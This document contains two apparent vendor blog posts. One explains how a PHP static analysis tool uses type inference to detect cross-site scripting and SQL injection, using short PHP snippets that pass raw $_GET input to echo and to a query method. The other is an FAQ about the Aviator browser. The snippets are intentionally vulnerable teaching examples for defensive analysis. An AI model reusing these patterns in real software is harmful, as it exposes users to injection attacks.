Static code analysis for security of the PHP programming language is nothing new. There are open source and commercial vendors already claiming support for this language and have done so for quite some time now. So what’s so special about the support for PHP in WhiteHat Sentinel Source? The answer centers on our advancement in the ability for static analysis to model and simulate the execution of PHP accurately. Almost every other PHP static code analysis offering is limited by the fact that it cannot overcome the unique challenges presented by dynamic programming languages, such as dynamic typing. With an inability to accurately model type information associated with expressions and statements, for example, users were unable to correctly capture rules needed to identify security vulnerabilities. WhiteHat Sentinel Source’s PHP offering ships with a highly tuned type inference system that piggy-backs off our patented Runtime Simulation algorithm to provide much deeper insight into source code – thereby overcoming the limitations of previous technologies.

Here is a classic PHP vulnerability that most, if not all, static code analysis tools should identify as a Cross-Site Scripting vulnerability:


$unsafe_variable = $_GET['user_input'];

echo "You searched for:<strong>".$unsafe_variable."</strong>";

This code retrieves untrusted data from the HTTP request, concatenates that input with string literals, and finally echoes the dynamically constructed content out to the HTML page. Writing static code analysis rules for any engine capable of data flow analysis is fairly straightforward: the return value of the _GET field access is a source of untrusted data, and the first argument to the echo invocation is a sink. Why is this easy to capture? Well… the signatures for the data types represented in the rules are incredibly simple. For example, the signature for echo is “echo(object)”, where “echo” is the function name and “(object)” indicates that it accepts one argument whose data type is unknown. We assume all parameter types are the type ‘object’ to keep things simple; we cannot possibly know all parameter types for all function invocations without performing richer analysis. Static analysis tools each have their own unique way of capturing security rules using a custom language. To keep the discussion of static analysis security rules vendor agnostic, we will only discuss rule writing and rule matching at the code signature level. Let’s agree on the format of [class name]->[function name]([one or more parameters]).
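To make the signature-level discussion concrete, here is a minimal Python sketch (purely illustrative, not Sentinel Source's actual rule language or engine) of matching a call site against an echo(object) sink rule by name and argument count alone:

```python
# Sink rules at the signature level [class name]->[function name](params),
# with parameter types collapsed to "object" (i.e. only arity matters).
# An empty class name models a free function like PHP's echo.
SINKS = {("", "echo", 1)}  # echo(object): no class, one argument

def is_sink(class_name: str, func_name: str, argc: int) -> bool:
    """Match a call site against the sink rules purely by signature."""
    return (class_name, func_name, argc) in SINKS

# The echo in the example receives one (tainted) argument, so it matches:
print(is_sink("", "echo", 1))  # -> True: tainted argument means XSS
```

Because no type information is needed here, even a simple data flow engine can match this rule reliably; the interesting cases come next.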

Let’s make this a little more interesting. Consider the following PHP code snippet that may or may not be indicative of a SQL Injection vulnerability:



$anonymous = new Anonymous ();

$anonymous->runQuery($_GET['name']);


This code instantiates a class called “Anonymous” and invokes the “runQuery” method of that class using untrusted data from the HTTP request. Is this vulnerable to SQL Injection? Well – it depends on what runQuery does. Let’s assume that the Anonymous class is part of a 3rd party library for which we do not have the source, or which we simply do not want to include in the scan. Let’s also assume that we know runQuery dynamically generates and executes SQL queries and is thus considered a sink. Based on these assumptions, a manual code review would clearly indicate that yes, this is vulnerable to SQL Injection. But how would we do this with static analysis? Here’s where it gets tricky…

We want to mark the “runQuery” method of the “Anonymous” type as a sink for SQL commands, such that if untrusted data is used as an argument to this method, then we have SQL Injection. The problem is that we must capture not only information about the “runQuery” method in our sink rule, but also the fact that it is associated with the “Anonymous” class. The code signature that must be reflected in the security rule looks as follows: Anonymous->runQuery(object).

Unfortunately, basic forms of static analysis are unable to determine with reasonable confidence that the $anonymous variable is of type Anonymous – in fact, $anonymous could be of any type! As a result, the underlying engine is never able to match the security rule to the $anonymous->runQuery($_GET[‘name’]) statement, resulting in a lost vulnerability.

How does WhiteHat Sentinel Source’s PHP offering overcome this problem? It’s simple… in theory. When the engine first runs, it builds a model of the source code and attempts to compare the data sink rule against the $anonymous->runQuery($_GET[‘name’]) method invocation. At this point, the only information we have about this statement is the method name and the number of arguments, producing a code signature as follows: ?->runQuery(object). Compare this signature to the signature represented in our sink rule: Anonymous->runQuery(object). Since we cannot know the type of the $anonymous variable at this point, we perform a partial match, comparing only the method name and arguments to those captured in the security rule. Since the statement’s signature is a partial match to our rule’s signature, we mark the model as such and move on.

After processing all our security rules, the static code analysis engine will begin performing data flow analysis on top of our patented Runtime Simulation algorithm, looking for security vulnerabilities. The engine will first see the expression “$anonymous = new Anonymous();” and record the fact that the $anonymous variable may, at any point in the future, be of type “Anonymous”. Next, the engine will hit the statement “$anonymous->runQuery($_GET[‘name’]);”. This statement was previously marked with a SQL Injection sink via a partial match. We now have more information about the $anonymous variable and can check whether the statement is a full match with the original security rule. The statement’s signature is now known to be Anonymous->runQuery(object), which fully matches the signature represented by the sink security rule. With a full match realized, the engine treats this statement as a sink and flags the SQL Injection vulnerability correctly!
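The two-phase idea can be sketched in a few lines of Python (an illustrative model of the partial-match/full-match flow described above, not the actual engine): first match on method name and arity alone, then upgrade to a full match once the inference pass has recorded a candidate type for the receiver.

```python
# Sink rule in [class]->[method](params) form, with arity standing in
# for the "(object)" parameter list.
SINK_RULE = ("Anonymous", "runQuery", 1)

def partial_match(func_name: str, argc: int) -> bool:
    """Pass 1: receiver type unknown, so match ?->runQuery(object)."""
    return (func_name, argc) == SINK_RULE[1:]

def full_match(candidate_types: set, func_name: str, argc: int) -> bool:
    """Pass 2: require the inferred receiver type to match as well."""
    return partial_match(func_name, argc) and SINK_RULE[0] in candidate_types

# Pass 1: only the name and argument count are known at this point.
assert partial_match("runQuery", 1)

# Pass 2: "$anonymous = new Anonymous()" was recorded by the inference
# pass, so the partial match can now be promoted to a full match.
print(full_match({"Anonymous"}, "runQuery", 1))  # -> True: flag SQLi
```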

Ok – that was a little too easy. Let’s make this more challenging… consider the following PHP code snippet:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = new Anonymous();
} elseif (funct_a() == funct_b()) {
     $anonymous = new NotSoAnonymous();
} else {
     $anonymous = new NsaAnonymous();
}

$anonymous->runQuery($_GET['name']);

What the heck does the engine do now when it sees the runQuery statement? The engine will collect all data type assignments for the $anonymous variable and use all such types in an attempt to realize a full matching for the runQuery statement. The engine will see three different possible code signatures for the statement. They are as follows:

Anonymous->runQuery(object)
NotSoAnonymous->runQuery(object)
NsaAnonymous->runQuery(object)

The engine will take these three signatures and compare them to the data type found in the signature represented by the partially matched security rule. Given that the first of the three fully matches the signature represented by the security rule, the engine will treat the statement as a sink and flag the SQL Injection vulnerability correctly!
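Extending the earlier sketch (again, an illustrative model rather than the real engine), the branch case reduces to an any-match over the set of candidate receiver types, since every assignment in every branch contributes a possible type:

```python
SINK_RULE = ("Anonymous", "runQuery", 1)

def any_full_match(candidate_types: set, func_name: str, argc: int) -> bool:
    """The call site is a sink if ANY candidate type fully matches,
    because every conditional is assumed to be taken at some point."""
    return any((t, func_name, argc) == SINK_RULE for t in candidate_types)

# Types collected from the three branches of the if/elseif/else above:
candidates = {"Anonymous", "NotSoAnonymous", "NsaAnonymous"}

print(any_full_match(candidates, "runQuery", 1))  # -> True: flag SQLi
```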

You may be asking yourself: “what if $anonymous was of type NotSoAnonymous or NsaAnonymous? Would it still flag a vulnerability?” The answer is a resounding yes. Static analysis technologies do not, and in my opinion should not, attempt to evaluate conditionals as such practice will lead to an overwhelming number of lost vulnerabilities. Static code analysis could support trivial conditionals, such as comparing primitives, but conditionals in real-world code require much more guesswork and various forms of heuristics that ultimately lead to poor results. Even so, is it not fair to say that at some point in the application “funct_a()” will be greater than “funct_b()”? Otherwise, what is the point of the conditional in the first place? Our technology assumes all conditionals will be true at some point in time.

Remember when I said this was easy in theory? Well, this is where it starts to get really interesting: Consider the following code snippet and assume we do not have the source code available for “create_class_1()”, “create_class_2()” and “create_class_3()”:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = create_class_1();
} elseif (funct_a() == funct_b()) {
     $anonymous = create_class_2();
} else {
     $anonymous = create_class_3();
}

$anonymous->runQuery($_GET['name']);

Now what is the range of possible data types for the $anonymous variable when it is used in the vulnerable statement? This is where we begin to stress the capabilities of the security rule language itself. WhiteHat Sentinel Source solves this by allowing the security rule writer to explicitly define the data type returned from a function invocation when that type cannot be determined from the provided source code. For example, the rule writer could capture a rule stating that the return value of the create_class_3() function invocation is of type Anonymous. The engine would then take this information, propagate data types as before, and correctly flag the SQL Injection vulnerability associated with the runQuery method invocation.
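One way to picture those rule-supplied return types (a hypothetical sketch; the names and rule format mirror the example above, not any real Sentinel rule syntax) is as a lookup table consulted whenever a factory's source is unavailable:

```python
# Hand-written rules supplying return types for opaque functions whose
# source is not part of the scan (hypothetical rule content).
RETURN_TYPE_RULES = {"create_class_3": "Anonymous"}

SINK_RULE = ("Anonymous", "runQuery", 1)

def types_from_factories(factory_names: list) -> set:
    """Collect candidate receiver types using rule-supplied return types;
    factories with no rule contribute nothing."""
    return {RETURN_TYPE_RULES[f] for f in factory_names if f in RETURN_TYPE_RULES}

candidates = types_from_factories(
    ["create_class_1", "create_class_2", "create_class_3"]
)
# Propagation then proceeds exactly as before: any candidate that fully
# matches the sink rule flags the runQuery call as SQL Injection.
print(any((t, "runQuery", 1) == SINK_RULE for t in candidates))  # -> True
```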

WhiteHat Sentinel Source’s type inference system allows us to perform more accurate and efficient analysis of source code in dynamically typed languages. Our type inference system not only allows us to more accurately capture security rules, but it also allows us to more accurately model control flow from method invocations of instances to method declarations of class declarations. Such capability is critical for any real world static code analysis of PHP source code.

I hope you enjoyed this rather technical and slightly lengthy blog post. It was a blast building out support for PHP and I look forward to our Sentinel Source customers benefiting from our newly available technology. Until next time…

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator utilizes open source software via Chromium; don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what was required for when Aviator would be publicly available.

Chromium, from which Aviator is derived, contains a wide variety of OSS licenses, as can be seen by visiting aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, if and when we make a change to GPL or similarly licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive, and requests for Windows, Linux, and even open source versions are pouring in, so we are definitely determining where to focus our resources next, but there is no definite timeframe yet for when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat, many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. It is a browser we feel confident using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and putting content directly on the page. They no longer have to physically create a new window because they can take over the entire page. With Aviator, the user’s browser never even makes the connection to an advertising network’s servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac App Store. Browsers attempt to take advantage of the fastest method of rendering they can, and the APIs involved are sometimes unsupported by the OS; these are called “private APIs”. Apple does not support these APIs because they may change, and Apple doesn’t want to be held accountable when things break. As a result, while Apple allows people to use its undocumented and very fast private APIs, it doesn’t allow people to distribute applications that use them. We can speculate that the reason is that users are likely to blame Apple rather than the program when things break. So after about a month of wrestling with it, we decided that for now we’d avoid the Mac App Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?

Fair point. As we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do, and Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the meantime, we’re mostly interested in offering a browser that security- and privacy-conscious people want to use.

Have you gotten any feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though various employees of those vendors have shared feedback informally over Twitter. Some of it has been positive, some negative. In either case, we’re most interested in serving the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.